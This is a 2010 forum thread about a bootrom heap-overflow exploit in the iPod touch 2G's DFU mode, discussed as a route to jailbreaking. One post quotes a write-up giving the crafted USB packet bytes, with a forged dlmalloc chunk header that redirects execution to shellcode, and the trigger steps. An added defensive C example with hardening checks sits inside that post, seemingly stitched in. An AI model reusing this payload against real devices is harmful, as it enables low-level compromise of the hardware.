iOS 4.1 MC Model iPod Touch Exploit

Discussion in 'iOS Jailbreak & Cydia' started by Stromos, Sep 20, 2010.

  1. Stromos

    Stromos Active Member

    Joined:
    Sep 23, 2008
    Messages:
    463
    Likes Received:
    114
    Device:
    iPhone 6
  2. TchnclFl

    TchnclFl New Member

    Joined:
    Sep 7, 2010
    Messages:
    631
    Likes Received:
    0
    Device:
    4G iPod touch
    MC model iPT 2Gs that is


    Don't forget the iPT4 is also an "MC" model

  3. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
    so what the hell does this mean
  4. TchnclFl

    TchnclFl New Member

    Joined:
    Sep 7, 2010
    Messages:
    631
    Likes Received:
    0
    Device:
    4G iPod touch
    It means that MC model iPT 2g can be jailbroken on any firmware. Not yet, but this opens the door for devs.
  5. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
  6. tanktan38

    tanktan38 Active Member

    Joined:
    Dec 29, 2009
    Messages:
    1,085
    Likes Received:
    15
    Device:
    3G iPod touch
    This means that ANY MC model device can be jailbroken. They just haven't released a tool yet.
  7. shimmy

    shimmy New Member

    Joined:
    Oct 19, 2009
    Messages:
    131
    Likes Received:
    0
    Device:
    iPhone 4 (Black)
    - pauseeeee ! -__-
  8. tanktan38

    tanktan38 Active Member

    Joined:
    Dec 29, 2009
    Messages:
    1,085
    Likes Received:
    15
    Device:
    3G iPod touch
    This is the page:

    usb_control_msg(0xA1, 1) Exploit

    A heap overflow exists in iPod touch 2G bootrom (old and new MC models) DFU mode when sending a USB control message of request type 0xA1, request 0x1.

    On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). posixninja analyzed and explained this one.

    Credit (Alphabetical)

    * vulnerability: pod2g
    * exploitation: pod2g
    * payload: unreleased

    Vulnerability

    By fuzzing all possible USB control messages of iPod2,1 DFU mode, it appeared that one special USB control message made it reboot. The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.

    Exploitation

    In order to exploit it, send this special USB packet (using 0x21, 1):

    Code:
    [ 0x100 bytes of nulls ]
    /* free'd buffer dlmalloc header: */
    0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk
    0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk
    /* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */
    0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction
    0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer
    0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)
    0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)
    0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)
    0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)
    0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)
    0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)
    /* attack dlmalloc header: */
    0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk
    0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 chosen randomly :-)
    0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()
    0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack
    Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.

    free() LR in stack will be replaced by FD, a pointer to the shellcode to execute !
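    The quoted write-up names two things a defender cares about: the overflow only shows up once the declared transfer length exceeds the 0x100-byte buffer (a missing length check), and the crafted fd/bk chunk header is what turns an overflow into a controlled write when the chunk is unlinked. The C below is an added illustration of both mitigations, not code from the wiki page, pod2g, or the bootrom: the request handler (`dfu_handle_request`, buffer size, request constants) is a hypothetical model of a DFU download path, and `safe_unlink` is the "both neighbours must point back at me" integrity check that modern allocators apply before honouring a free chunk's links.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical DFU staging buffer; 0x100 is the threshold the post reports. */
#define DFU_BUF_SIZE 0x100

/* USB SETUP packet layout (8 bytes, little-endian fields, USB 2.0 sec. 9.3). */
struct usb_setup {
    uint8_t  bmRequestType;
    uint8_t  bRequest;
    uint16_t wValue;
    uint16_t wIndex;
    uint16_t wLength;
};

/* Request types from the post: 0x21,1 is the host-to-device download. */
#define REQTYPE_CLASS_IFACE_OUT 0x21

static uint8_t dfu_buf[DFU_BUF_SIZE];

/* Hardened handler: a transfer longer than the staging buffer is refused
   instead of copied. Returns bytes accepted, or -1 on rejection. */
int dfu_handle_request(const struct usb_setup *s, const uint8_t *data, size_t data_len)
{
    if (s->bmRequestType != REQTYPE_CLASS_IFACE_OUT || s->bRequest != 1)
        return -1;                       /* not a DFU download request */
    if (s->wLength > DFU_BUF_SIZE)       /* the missing check: > 0x100 would overflow */
        return -1;
    if (data_len < s->wLength)           /* short packet: never read past what arrived */
        return -1;
    memcpy(dfu_buf, data, s->wLength);
    return (int)s->wLength;
}

/* Minimal dlmalloc-style free chunk: fd/bk links live inside the chunk body,
   which is exactly why an overflow can rewrite them. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Safe unlink: only touch the neighbours if they both point back at p.
   A forged fd/bk pair (as in the post's "attack dlmalloc header") fails this
   test, so no write happens. Returns 0 on success, -1 if the list is corrupt. */
int safe_unlink(struct chunk *p)
{
    if (p->fd == NULL || p->bk == NULL)
        return -1;
    if (p->fd->bk != p || p->bk->fd != p)
        return -1;
    p->fd->bk = p->bk;
    p->bk->fd = p->fd;
    return 0;
}

/* Constructed scenario: a zero-filled payload with a chosen wLength. */
int demo_dfu(uint16_t wlen)
{
    static uint8_t payload[0x200];       /* constructed input, all zeros */
    struct usb_setup s = { REQTYPE_CLASS_IFACE_OUT, 1, 0, 0, wlen };
    return dfu_handle_request(&s, payload, sizeof payload);
}

/* Constructed scenario: a <-> b <-> c, then unlink b. With forge != 0, b's fd
   is redirected at a chunk that does not point back (simulated corruption). */
int demo_unlink(int forge)
{
    struct chunk a = {0}, b = {0}, c = {0}, rogue = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    if (forge)
        b.fd = &rogue;
    int rc = safe_unlink(&b);
    if (rc == 0 && (a.fd != &c || c.bk != &a))
        return -2;                       /* unlink claimed success but list is wrong */
    if (rc != 0 && (a.fd != &b || c.bk != &b))
        return -3;                       /* rejection must leave neighbours untouched */
    return rc;
}

int main(void)
{
    printf("wLength 0x100 -> %d\n", demo_dfu(0x100));   /* accepted */
    printf("wLength 0x101 -> %d\n", demo_dfu(0x101));   /* rejected */
    printf("honest unlink -> %d\n", demo_unlink(0));    /* 0 */
    printf("forged unlink -> %d\n", demo_unlink(1));    /* -1 */
    return 0;
}
```

The two checks are independent: the length check stops the overflow from happening at all, while the unlink check is defence in depth that detects a corrupted free list even if some other write reaches the chunk header.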
  9. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
  10. slurpeeking

    slurpeeking Member

    Joined:
    Sep 18, 2010
    Messages:
    320
    Likes Received:
    0
    Device:
    2G iPod touch
    So anyone who knows obj-c can attempt to make a jailbreak right now

